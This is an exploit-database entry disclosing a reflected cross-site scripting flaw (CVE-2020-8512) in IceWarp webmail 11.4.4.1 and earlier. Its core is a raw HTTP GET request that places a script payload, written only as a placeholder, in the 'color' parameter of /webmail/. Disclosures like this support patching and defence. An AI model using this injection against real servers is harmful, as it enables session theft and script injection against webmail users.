IceWarp 11.4.4.1 Cross-Site Scripting

January 27, 2020

Exploit Author : Lutfu Mert Ceylan
Date : 27.01.2020
Software Link : https://gitlab.icewarp.com/pub/c-client/tree/tags/11.4.4.1/
Vendor Homepage : https://www.icewarp.com/
Version : IceWarp 11.4.4.1 and below
Tested on : Mozilla Firefox 56.0 && Opera 66.0.3515.44
Category : Reflected XSS
CVE ID : CVE-2020-8512



GET REQUEST :

GET /webmail/?color=XSS PAYLOAD HTTP/1.1
Host: targethost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: cookie
Connection: close
Upgrade-Insecure-Requests: 1

Vulnerable Page : /webmail/
Vulnerable Parameter : color

Exploit DB : 47988